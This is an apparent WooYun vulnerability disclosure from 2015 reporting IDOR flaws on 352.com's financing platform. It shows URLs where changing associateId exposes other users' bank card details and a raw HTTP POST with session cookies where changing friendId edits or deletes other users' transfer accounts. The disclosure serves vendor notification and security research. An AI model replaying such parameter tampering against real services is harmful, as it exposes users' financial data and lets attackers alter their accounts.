当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118637

漏洞标题:融资城遍历用户银行卡信息+越权修改删除转账账号

相关厂商:352.com

漏洞作者: 勿忘初心

提交时间:2015-06-08 10:32

修复时间:2015-07-23 14:36

公开时间:2015-07-23 14:36

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-08: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

融资城遍历用户银行卡信息+越权修改删除转账账号

详细说明:

1、首先来看看用户银行卡信息遍历吧,涉及万余用户
https://supervise.352.com/supervisor/superAssociateEdit.do?at=bank&associateType=2&accountNumber=8618381404253972&associateId=12112

21.png


https://supervise.352.com/supervisor/superAssociateEdit.do?at=bank&associateType=2&accountNumber=8618381404253972&associateId=11112

22.png


https://supervise.352.com/supervisor/superAssociateEdit.do?at=bank&associateType=2&accountNumber=8618381404253972&associateId=111

23.png

漏洞证明:

2、越权修改删除转账账号(发现越权修改的效果相当于删除)
为了不影响业务,这里用的两个测试账号
首先,设置转账账号

31.png


账号A添加账户

32.png


账号B添加账户

33.png


点击修改或者删除,这里点击修改,post包如下

POST /supervisor/superTransferFriendEditSubmit.do HTTP/1.1
Host: supervise.352.com
Connection: keep-alive
Content-Length: 132
Accept: */*
Origin: https://supervise.352.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://supervise.352.com/supervisor/superTransferFriendMain.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: cookie_user=46a54da91e934f81b7df58257ae44765; cf=#u30; cp=#u30; cr=#u30; cln=""; JSESSIONID=4CD6643666DBA5BF354DE3EB4D98DB51.b; su=#u31; at=#u4c#u6f#u76#u65#u4a#u6f#u6e#u65#u73; bid=#u38#u36#u31#u38#u33#u38#u31#u35#u30#u36#u30#u35#u37#u35#u31#u39; chknum=#u31; rn=#u5459#u90b5#u660e; mi=""; Hm_lvt_9ee5e8baadd4fd8000f63f7e91665495=1433575168,1433575180; Hm_lpvt_9ee5e8baadd4fd8000f63f7e91665495=1433578604; Hm_lvt_cd84449f9d5b37a5fc86a6f755298cbc=1433422301,1433486902,1433575024; Hm_lpvt_cd84449f9d5b37a5fc86a6f755298cbc=1433578604; WHOSYOURDADDY=1
mobileTransferTo=xxxxxxx%40163.com&accountTransferTo=8618381506057519&friendGroup=&accountTransferFrom=000000000&friendId=1957


修改friendId,成功删除

34.png

修复方案:

礼物有木有~

版权声明:转载请注明来源 勿忘初心@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-08 14:36

厂商回复:

thx

最新状态:

暂无


漏洞评价:

评论